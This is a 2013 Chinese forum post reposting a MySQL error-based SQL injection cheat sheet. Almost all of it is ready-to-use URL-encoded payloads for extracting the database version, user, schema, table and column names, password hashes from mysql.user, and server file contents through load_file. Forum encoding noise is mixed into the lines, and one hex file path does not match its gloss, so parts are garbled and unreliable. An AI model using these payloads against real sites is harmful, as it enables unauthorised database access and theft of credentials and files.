Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
1 d& p$ m' f' R6 b& z9 V0 ^
2 u  O/ V1 w8 @) l+ z' ?
Mysql暴错注入参考（pdf），每天一贴。。。
1 y8 P- _. M  r- h' b
. u% Q5 t" C0 l7 Q0 r$ l2 V. a/ QMySql Error Based Injection Reference
[Mysql暴错注入参考]
' t$ n. Z0 z. r/ V/ y6 PAuthornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
7 d$ [) }. b" WMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
9 u, e- R3 {) r& a& W小部分版本使用name_const()时会报错.可以用给出的Method.2测试
' K( Y- s( E/ a  D( q+ k4 @查询版本:
" l/ K/ j/ ~( Y3 V! Q+ [" c% JMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
. i& j( U; G0 a; `3 h5 c, Y$ ~join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
4 h0 w; `7 R* C. S" f, UMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
# V* p5 F+ u  Uand(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
% H' D6 C/ Z. u/ g& H# Hor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
0 F8 V3 b- P2 |3 x依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
) q; H' H+ q! v' J6 n& q/ V6 a爆指定库数目:
: g" y$ v! w  \0 J# kand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
3 k- L: O2 R* Cable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
/ c4 |  W- X9 C" J/ |( f; Hbles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
9 V' W) p9 i. o1 W/ s; Q7 O爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
1 f" t& s3 G6 F& W& A0 {. J/ I! _0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
" ?) Y3 W4 e2 Z$ Q依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
2 k/ ?' p" _, I% N5 ~7 Z+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
! f& b" w( Q9 H, h. ^0 `7 i2 s% e  V! Ploor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
& T" f4 W: t9 s$ Z  ~依次暴内容:
+ m* S2 w2 i' f& kand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
3 G# B5 ~/ C9 d5 ~3 n: T爆文件内容:
% m  ~( Q; U% Y3 i/ z+ Nand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
5 B' Y- C* A- D$ f- k/ ?( o7 B8 P0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

不要下载也可以，